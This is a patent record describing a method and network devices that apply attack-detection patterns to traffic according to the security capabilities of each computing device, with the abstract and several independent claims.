Hierarchical application of security services within a computer network
First Claim
1. A method comprising:
- receiving, with a network device, security classification information sent to the network device from a second network device, wherein the security classification information identifies at least one mapping between a security class and at least one computing device, wherein the security class identifies security capabilities of the at least one computing device;
after receiving the security classification information from the second network device, receiving, with the network device, network traffic associated with the at least one computing device;
applying, with the network device, a set of patterns defined by a policy associated with the security class to the network traffic to detect any of a corresponding set of network attacks; and
forwarding, with the network device, the network traffic based on the application of the set of patterns.
1 Assignment
0 Petitions
Accused Products
Abstract
In general, techniques are described for hierarchical application of security services with a network device. In particular, the network device receives security classification information that maps a security class to one or more computing devices. The security class identifies security capabilities of the computing devices. The network device also receives network traffic associated with the computing device and applies a set of patterns defined by a policy associated with the security class to the network traffic to detect a set of network attacks. Based on the application of the set of patterns, the network device forwards the network traffic. As a result of receiving security classification information, the network device may become aware of the security capabilities of the computing device and only apply those patterns required to augment these detected security capabilities, thereby preventing application of overlapping security services through application of these services in a hierarchical manner.
-
Citations
41 Claims
-
1. A method comprising:
-
receiving, with a network device, security classification information sent to the network device from a second network device, wherein the security classification information identifies at least one mapping between a security class and at least one computing device, wherein the security class identifies security capabilities of the at least one computing device; after receiving the security classification information from the second network device, receiving, with the network device, network traffic associated with the at least one computing device; applying, with the network device, a set of patterns defined by a policy associated with the security class to the network traffic to detect any of a corresponding set of network attacks; and forwarding, with the network device, the network traffic based on the application of the set of patterns. - View Dependent Claims (2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14)
-
-
15. A network device comprising:
-
at least one network interface card to receive security classification information sent to the network device from a second network device, the security classification information mapping a security class to at least one computing device within the network, and the security class identifying security capabilities of the at least one computing device wherein the at least one network interface card, after receiving the security classification information from the second network device, receives network traffic; and a control unit comprising a processor coupled to the network interface card; wherein the control unit further comprises a storage medium that stores the security classification information and a policy associated with the security class, and wherein the processor applies a set of patterns defined by the policy to the network traffic to detect any of a set of network attacks and forwards the network traffic based on the application of the set of patterns. - View Dependent Claims (16, 17, 18, 19, 20, 21, 22, 23, 24)
-
-
25. A network system comprising:
-
a set of computing devices; an access device coupled to the set of computing devices; a network device coupled to the access device, wherein the network device includes; at least one network interface card to receive security classification information sent to the network device from a second network device, the security classification information mapping a security class to at least one computing device within the network, and the security class identifying security capabilities of the at least one computing device, wherein the at least one network interface card, after receiving the security classification information from the second network device, receives network traffic; and a control unit coupled to the network interface, wherein the control unit comprises a storage medium storing the security classification information mapping and a policy associated with the security class, and wherein the control unit applies a set of patterns defined by the policy to the network traffic to detect any of a set of network attacks and forwards the network traffic based on the application of the set of patterns. - View Dependent Claims (26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38)
-
-
39. A non-transitory computer-readable storage medium comprising instructions for causing a programmable processor to:
-
receive, with a network device, security classification information sent to the network device from a second network device, wherein the security classification information t identifies at least one mapping between a security class and at least one computing device, wherein the security class identifies security capabilities of the at least one computing device; after receiving the security classification information from the second network device, receive, with the network device, network traffic associated with the at least one computing device; apply, with the network device, a set of patterns defined by a policy associated with the security class to the network traffic to detect a corresponding set of network attacks; and forward, with the network device, the network traffic based on the application of the set of patterns.
-
-
40. A method comprising:
-
receiving, with one or more layer two (L2) network access device, access requests from a plurality of computing devices; in response to the access requests, collecting security information from each of the plurality of computing devices by way of at least one communication directed to the network security device, wherein the security information identifies security capabilities of each of the plurality of computing devices; assigning a first set of the plurality of computing devices to a first security class and assigning a second set of the plurality of computing devices to a second security class based on the security capabilities of each of the computing devices; receiving, with a layer three (L3) network device, network traffic associated with the plurality of computing devices; applying, with the L3 network device, a first set of attack detection patterns only to a first portion of the network traffic associated with the first set of the computing devices to detect a corresponding first set of network attacks, wherein the first set of patterns is defined by a policy associated with the first security class; applying, with the L3 network device, a second set of attack detection patterns only to a second portion of the network traffic associated with the second set of the computing devices to detect a second corresponding set of network attacks, wherein the second set of patterns is defined by a policy associated with the second security class and differs from the first set of patterns by at least one pattern; and forwarding, with the L3 network device, the network traffic based on the application of the first set of patterns and the second set of patterns. - View Dependent Claims (41)
-
Specification